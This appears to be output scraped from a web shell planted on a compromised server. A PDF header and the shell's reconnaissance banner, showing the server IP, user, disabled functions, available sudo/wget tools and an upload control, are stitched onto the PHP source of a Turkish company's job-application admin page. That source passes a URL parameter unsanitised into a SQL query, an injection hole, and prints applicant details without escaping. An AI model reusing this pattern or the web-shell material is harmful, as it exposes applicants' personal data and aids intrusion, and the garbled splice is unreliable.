%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj <
| Server IP : 212.252.79.165 / Your IP : 216.73.216.24 [ Web Server : Apache System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 User : cehaburo ( 1001) PHP Version : 8.1.33 Disable Function : exec,passthru,shell_exec,system Domains : 48 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/cehaburo/public_html/admin/ |
Upload File : |
<?php
include 'lib/include.php';
$career_id = $_GET['selected-form'];
$career_form_result = $ceha->query("SELECT * FROM tbl_career_form WHERE id='$career_id' AND active='1'");
$career_form = $career_form_result->fetch_array();
$check = $career_form['formdata'];
$keywords = preg_split("/[\s,=,&]+/", $check);
$arr=array();
for($i=0;$i<sizeof($keywords);$i++)
{
$arr[$keywords[$i]] = $keywords[++$i];
}
include 'header.php';
?>
<div class="row">
<div class="col-md-12 grid-margin stretch-card">
<div class="card">
<div class="card-body">
<h4 class="card-title"><a onClick="printDiv();" class="btn btn-primary btn-block btn-lg text-white text-uppercase">Yazdır</a></h4>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12 grid-margin stretch-card">
<div class="card">
<div class="card-body">
<div class="row" id="printableArea">
<div class="col-12">
<h5 style="font-size: 20px;">Kişisel Bilgiler</h5>
<hr>
</div>
<div class="col-6">
<p><strong>Ad Soyad:</strong> <?php echo urldecode($arr['name']); ?></p>
</div>
<div class="col-6">
<p><strong>Doğum Tarihi:</strong> <?php echo urldecode($arr['birthdate']); ?></p>
</div>
<div class="col-6">
<p><strong>Askerlik Durumu:</strong> <?php if($arr['military']==1){echo "Yaptı";}else if($arr['military']==2){echo "Tecilli";}else if($arr['military']==3){echo "Muaf";} ?></p>
</div>
<div class="col-6">
<p><strong>Askerlik Durumu Detayı:</strong> <?php if($arr['military']==1){echo "Yaptı";}else if($arr['military']==2){echo urldecode($arr['tecil_reason']);}else if($arr['military']==3){echo urldecode($arr['muaf_reason']);} ?></p>
</div>
<div class="col-6">
<p><strong>Engel Durumu:</strong> <?php if($arr['disability']==1){echo "Yok";}else if($arr['disability']==2){echo "Var";} ?></p>
</div>
<div class="col-6">
<p><strong>Engel Detayı:</strong> <?php if($arr['disability']==1){echo "Yok";}else if($arr['disability']==2){echo urldecode($arr['disability_situation']);} ?></p>
</div>
<div class="col-6">
<p><strong>Seyahat Engeli Durumu:</strong> <?php if($arr['travel']==1){echo "Yok";}else if($arr['travel']==2){echo "Var";} ?></p>
</div>
<div class="col-6">
<p><strong>Seyahat Engeli Detayı:</strong> <?php if($arr['travel']==1){echo "Yok";}else if($arr['travel']==2){echo urldecode($arr['travel_situation']);} ?></p>
</div>
<div class="col-6">
<p><strong>İkamet Adresi:</strong> <?php echo urldecode($arr['residence_address']); ?></p>
</div>
<div class="col-6">
<p><strong>Bu Adreste İkamet Ediyor:</strong> <?php if($arr['residence']==1){echo "Evet";}else {echo "Hayır";} ?></p>
</div>
<div class="col-4">
<p><strong>Mahalle:</strong> <?php echo urldecode($arr['neighbourhood']); ?></p>
</div>
<div class="col-4">
<p><strong>İlçe:</strong> <?php echo urldecode($arr['district']); ?></p>
</div>
<div class="col-4">
<p><strong>İl:</strong> <?php echo urldecode($arr['city']); ?></p>
</div>
<div class="col-6">
<p><strong>Telefon:</strong> <?php echo urldecode($arr['cellPhone']); ?></p>
</div>
<div class="col-6">
<p><strong>E-Posta:</strong> <?php echo urldecode($arr['email']); ?></p>
</div>
<div class="col-12">
<h5 style="margin-top: 30px;font-size: 20px;">Öğrenim Bilgileri</h5>
<hr>
</div>
<div class="col-3">
<p><strong>Mezuniyet Durumu:</strong> <?php if($arr['school']==1){echo "Lise";}else if($arr['school']==2){echo "Lisans";}else if($arr['school']==3){echo "Yüksek";} ?></p>
</div>
<div class="col-4">
<p><strong>Okulu:</strong> <?php echo urldecode($arr['school_reason']); ?></p>
</div>
<div class="col-4">
<p><strong>Bölümü:</strong> <?php echo urldecode($arr['branch_reason']); ?></p>
</div>
<div class="col-12">
<h5 style="margin-top: 30px;font-size: 20px;">Yabancı Dil</h5>
<hr>
</div>
<?php
$i=1;
while($i <= $arr['cr-lg-row-count']){
?>
<div class="col-6">
<p><strong>Yabancı Dil:</strong> <?php echo urldecode($arr['cr-lg-row-'.$i.'-language']); ?></p>
</div>
<div class="col-6">
<p><strong>Seviye:</strong> <?php echo urldecode($arr['cr-lg-row-'.$i.'-language']); ?></p>
</div>
<?php
$i=$i+1;
}
?>
<div class="col-12">
<h5 style="margin-top: 30px;font-size: 20px;">Daha Önce Çalıştığı İşyerleri</h5>
<hr>
</div>
<div class="col-12">
<p><strong>Mevcut İş Durumu:</strong> <?php if($arr['work']==1){echo "Çalışıyor";}else if($arr['work']==2){echo "Çalışmıyor";} ?></p>
</div>
<?php
$i=1;
while($i <= $arr['cr-wc-row-count']){
?>
<div class="col-2">
<p><strong>İşyeri Adı:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-name']); ?></p>
</div>
<div class="col-2">
<p><strong>Görevi:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-position']); ?></p>
</div>
<div class="col-2">
<p><strong>İşe Başlama Tarihi:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-sdate']); ?></p>
</div>
<div class="col-2">
<p><strong>İşten Ayrılma Tarihi:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-edate']); ?></p>
</div>
<div class="col-2">
<p><strong>Net Ücret:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-price']); ?></p>
</div>
<div class="col-2">
<p><strong>Ayrılma Sebebi:</strong> <?php echo urldecode($arr['cr-wc-row-'.$i.'-leaver']); ?></p>
</div>
<?php
$i=$i+1;
}
?>
<div class="col-12">
<h5 style="margin-top: 30px;font-size: 20px;">Referanslar</h5>
<hr>
</div>
<?php
$i=1;
while($i <= $arr['cr-ref-row-count']){
?>
<div class="col-3">
<p><strong>Adı Soyadı:</strong> <?php echo urldecode($arr['cr-ref-row-1-name']); ?></p>
</div>
<div class="col-3">
<p><strong>İşi / Mesleği:</strong> <?php echo urldecode($arr['cr-ref-row-1-job']); ?></p>
</div>
<div class="col-3">
<p><strong>Adresi:</strong> <?php echo urldecode($arr['cr-ref-row-1-address']); ?></p>
</div>
<div class="col-3">
<p><strong>Telefonu:</strong> <?php echo urldecode($arr['cr-ref-row-1-phone']); ?></p>
</div>
<?php
$i=$i+1;
}
?>
<div class="col-12">
<h5 style="margin-top: 30px;font-size: 20px;">Notlar</h5>
<hr>
</div>
<div class="col-12">
<p><strong>Notlar:</strong> <?php echo urldecode($arr['notes']); ?></p>
<hr>
<div class="col-12">
<p><strong>Açık Rıza Metnini Onayladı mı?:</strong> <?php if($arr['consent']==1){echo "Onayladı";}else if($arr['formConfirm']==''){echo "Onaylamadı";} ?></p>
</div>
<div class="col-12">
<p><strong>Bilgilerin doğruluğunu kabul etti mi?:</strong> <?php if($arr['formConfirm']==1){echo "Evet";}else if($arr['formConfirm']==''){echo "Hayır";} ?></p>
</div>
</div>
</div>
</div>
</div>
</div>
<script>
function printDiv() {
var divContents = document.getElementById("printableArea").innerHTML;
var a = window.open('', '', 'height=1000, width=1200');
a.document.write('<html>');
a.document.write('<body>');
a.document.write(divContents);
a.document.write('</body></html>');
a.document.close();
a.print();
}
</script>
<?php include 'footer.php'; ?>